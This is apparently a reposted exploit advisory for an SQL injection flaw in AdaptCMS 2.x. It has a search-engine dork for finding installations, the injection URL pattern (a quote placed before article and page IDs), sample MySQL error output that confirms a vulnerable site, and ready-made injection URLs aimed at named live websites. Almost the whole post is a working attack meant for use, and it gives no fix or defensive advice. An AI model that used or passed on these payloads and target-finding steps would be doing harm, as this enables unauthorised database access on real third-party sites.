AdaptCMS 2.x SQL Injection Vulnerability
# Exploit Title : AdaptCMS 2.x SQL Injection Vulnerability
# Dorks : intext:"Powered by AdaptCMS" OR Powered by AdaptCMS
POC :
1.SQL Injection Vulnerability
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/victim site/public_html/directory/config.php on line 262
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/victim site/public_html/directory/config.php on line 293
- Open Victim Website : http://<site>/<AdaptCMS Installation Path>/article/'Article ID/Page Name/Article Title
Example :
http://www.adaptcms.com/article/'66/Blog/AdaptCMS-20-March-26th
http://www.adaptcms.com/article/'75/News/AdaptCMS-200-Released
http://www.rock.insanevisions.com/article/'293/Album/Pink-Floyd-Animals
http://www.insanevisions.com/article/'294/News/AdaptCMS-202-Update
- Open Victim Website : http://<site>/<AdaptCMS Installation Path>/page/'Page ID/Page Title
Example :
http://www.adaptcms.com/page/'33/downloads
http://www.rock.insanevisions.com/page/'1/About-Us/
http://www.insanevisions.com/page/'3/Downloads/
0 komentar — Skip ke Kotak Komentar
Posting Komentar — or Kembali ke Postingan